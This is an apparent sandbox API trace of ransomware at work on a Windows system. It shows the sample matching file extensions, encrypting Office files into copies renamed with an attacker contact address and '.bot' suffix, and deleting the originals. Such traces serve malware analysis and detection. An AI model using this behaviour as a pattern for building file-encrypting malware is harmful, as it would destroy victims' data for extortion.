	[0147.370] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0147.370] lstrlenW (lpString=".pdf") returned 4
	[0147.370] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.370] lstrlenW (lpString=".xls") returned 4
	[0147.370] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.370] lstrlenW (lpString=".xlsx") returned 5
	[0147.370] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0147.370] lstrlenW (lpString=".ppt") returned 4
	[0147.370] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.371] lstrlenW (lpString=".zip") returned 4
	[0147.371] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.371] lstrlenW (lpString=".rar") returned 4
	[0147.371] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.371] lstrlenW (lpString=".bz2") returned 4
	[0147.371] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.371] lstrlenW (lpString=".7z") returned 3
	[0147.371] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.371] lstrlenW (lpString=".dbf") returned 4
	[0147.371] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.371] lstrlenW (lpString=".1cd") returned 4
	[0147.371] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.371] lstrlenW (lpString=".jpg") returned 4
	[0147.371] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.371] lstrlenW (lpString=".doc") returned 4
	[0147.371] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.371] lstrlenW (lpString=".docx") returned 5
	[0147.371] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0147.371] lstrlenW (lpString=".pdf") returned 4
	[0147.371] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.371] lstrlenW (lpString=".xls") returned 4
	[0147.371] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.371] lstrlenW (lpString=".xlsx") returned 5
	[0147.371] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0147.371] lstrlenW (lpString=".ppt") returned 4
	[0147.372] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.372] lstrlenW (lpString=".zip") returned 4
	[0147.372] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.372] lstrlenW (lpString=".rar") returned 4
	[0147.372] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.372] lstrlenW (lpString=".bz2") returned 4
	[0147.372] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.372] lstrlenW (lpString=".7z") returned 3
	[0147.372] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.372] lstrlenW (lpString=".dbf") returned 4
	[0147.372] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.372] lstrlenW (lpString=".1cd") returned 4
	[0147.372] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.372] lstrlenW (lpString=".jpg") returned 4
	[0147.372] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.372] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0147.372] lstrlenW (lpString="MAPIR.DLL.IDX_DLL") returned 17
	[0147.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.414] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=108416) returned 1
	[0147.414] CloseHandle (hObject=0x3a0) returned 1
	[0147.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll")) returned 0x20
	[0147.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.415] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.415] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.416] GetLastError () returned 0x0
	[0147.416] ReadFile (in: hFile=0x3a0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1a780, lpOverlapped=0x0) returned 1
	[0147.458] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1a790, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1a790, lpOverlapped=0x0) returned 1
	[0147.460] ReadFile (in: hFile=0x3a0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.460] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0147.461] SetEndOfFile (hFile=0x3c4) returned 1
	[0147.461] CloseHandle (hObject=0x3c4) returned 1
	[0147.461] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.461] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.464] CloseHandle (hObject=0x3a0) returned 1
	[0147.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll")) returned 1
	[0147.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.486] lstrlenW (lpString=".doc") returned 4
	[0147.486] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0147.486] lstrlenW (lpString=".docx") returned 5
	[0147.487] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0147.487] lstrlenW (lpString=".pdf") returned 4
	[0147.487] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString=".xls") returned 4
	[0147.487] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString=".xlsx") returned 5
	[0147.487] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0147.487] lstrlenW (lpString=".ppt") returned 4
	[0147.487] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.487] lstrlenW (lpString=".zip") returned 4
	[0147.487] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString=".rar") returned 4
	[0147.487] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString=".bz2") returned 4
	[0147.487] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString=".7z") returned 3
	[0147.487] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.487] lstrlenW (lpString=".dbf") returned 4
	[0147.487] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.487] lstrlenW (lpString=".1cd") returned 4
	[0147.487] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.487] lstrlenW (lpString=".jpg") returned 4
	[0147.487] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0147.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.487] lstrlenW (lpString=".doc") returned 4
	[0147.488] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString=".docx") returned 5
	[0147.488] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0147.488] lstrlenW (lpString=".pdf") returned 4
	[0147.488] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString=".xls") returned 4
	[0147.488] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString=".xlsx") returned 5
	[0147.488] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0147.488] lstrlenW (lpString=".ppt") returned 4
	[0147.488] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.488] lstrlenW (lpString=".zip") returned 4
	[0147.488] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString=".rar") returned 4
	[0147.488] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString=".bz2") returned 4
	[0147.488] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString=".7z") returned 3
	[0147.488] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.488] lstrlenW (lpString=".dbf") returned 4
	[0147.488] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.488] lstrlenW (lpString=".1cd") returned 4
	[0147.488] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0147.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65
	[0147.488] lstrlenW (lpString=".jpg") returned 4
	[0147.488] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0147.489] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.489] lstrlenW (lpString="MPXRES.DLL") returned 10
	[0147.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mpxres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.489] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=12664) returned 1
	[0147.489] CloseHandle (hObject=0x3bc) returned 1
	[0147.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mpxres.dll")) returned 0x20
	[0147.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mpxres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mpxres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.490] lstrlenW (lpString=".doc") returned 4
	[0147.490] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.490] lstrlenW (lpString=".docx") returned 5
	[0147.490] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0147.490] lstrlenW (lpString=".pdf") returned 4
	[0147.490] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.490] lstrlenW (lpString=".xls") returned 4
	[0147.490] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.490] lstrlenW (lpString=".xlsx") returned 5
	[0147.490] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0147.490] lstrlenW (lpString=".ppt") returned 4
	[0147.490] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.490] lstrlenW (lpString=".zip") returned 4
	[0147.490] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.490] lstrlenW (lpString=".rar") returned 4
	[0147.490] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.490] lstrlenW (lpString=".bz2") returned 4
	[0147.490] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.490] lstrlenW (lpString=".7z") returned 3
	[0147.490] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.491] lstrlenW (lpString=".dbf") returned 4
	[0147.491] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.491] lstrlenW (lpString=".1cd") returned 4
	[0147.491] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.491] lstrlenW (lpString=".jpg") returned 4
	[0147.491] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.491] lstrlenW (lpString=".doc") returned 4
	[0147.491] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.491] lstrlenW (lpString=".docx") returned 5
	[0147.491] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0147.491] lstrlenW (lpString=".pdf") returned 4
	[0147.491] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.491] lstrlenW (lpString=".xls") returned 4
	[0147.491] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.491] lstrlenW (lpString=".xlsx") returned 5
	[0147.491] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0147.491] lstrlenW (lpString=".ppt") returned 4
	[0147.491] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.491] lstrlenW (lpString=".zip") returned 4
	[0147.491] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.491] lstrlenW (lpString=".rar") returned 4
	[0147.491] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.491] lstrlenW (lpString=".bz2") returned 4
	[0147.491] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.491] lstrlenW (lpString=".7z") returned 3
	[0147.492] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.492] lstrlenW (lpString=".dbf") returned 4
	[0147.492] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.492] lstrlenW (lpString=".1cd") returned 4
	[0147.492] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MPXRES.DLL") returned 58
	[0147.492] lstrlenW (lpString=".jpg") returned 4
	[0147.492] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.492] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0147.492] lstrlenW (lpString="MSACCESS.DEV.HXS") returned 16
	[0147.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.623] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=10745972) returned 1
	[0147.623] CloseHandle (hObject=0x398) returned 1
	[0147.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev.hxs")) returned 0x20
	[0147.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.638] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0147.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.638] lstrlenW (lpString=".doc") returned 4
	[0147.638] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.638] lstrlenW (lpString=".docx") returned 5
	[0147.638] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0147.638] lstrlenW (lpString=".pdf") returned 4
	[0147.638] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.638] lstrlenW (lpString=".xls") returned 4
	[0147.638] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.638] lstrlenW (lpString=".xlsx") returned 5
	[0147.638] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0147.638] lstrlenW (lpString=".ppt") returned 4
	[0147.638] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.638] lstrlenW (lpString=".zip") returned 4
	[0147.638] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.638] lstrlenW (lpString=".rar") returned 4
	[0147.638] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.638] lstrlenW (lpString=".bz2") returned 4
	[0147.639] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.639] lstrlenW (lpString=".7z") returned 3
	[0147.639] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.639] lstrlenW (lpString=".dbf") returned 4
	[0147.639] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.639] lstrlenW (lpString=".1cd") returned 4
	[0147.639] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.639] lstrlenW (lpString=".jpg") returned 4
	[0147.639] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.639] lstrlenW (lpString=".doc") returned 4
	[0147.639] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.639] lstrlenW (lpString=".docx") returned 5
	[0147.639] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0147.639] lstrlenW (lpString=".pdf") returned 4
	[0147.639] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.639] lstrlenW (lpString=".xls") returned 4
	[0147.639] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.639] lstrlenW (lpString=".xlsx") returned 5
	[0147.639] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0147.639] lstrlenW (lpString=".ppt") returned 4
	[0147.639] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.639] lstrlenW (lpString=".zip") returned 4
	[0147.639] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.639] lstrlenW (lpString=".rar") returned 4
	[0147.639] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.639] lstrlenW (lpString=".bz2") returned 4
	[0147.640] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.640] lstrlenW (lpString=".7z") returned 3
	[0147.640] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.640] lstrlenW (lpString=".dbf") returned 4
	[0147.640] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.640] lstrlenW (lpString=".1cd") returned 4
	[0147.640] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS") returned 64
	[0147.640] lstrlenW (lpString=".jpg") returned 4
	[0147.640] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.640] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0147.640] lstrlenW (lpString="MSACCESS.DEV_COL.HXC") returned 20
	[0147.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.640] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=656) returned 1
	[0147.641] CloseHandle (hObject=0x3c8) returned 1
	[0147.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxc")) returned 0x20
	[0147.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
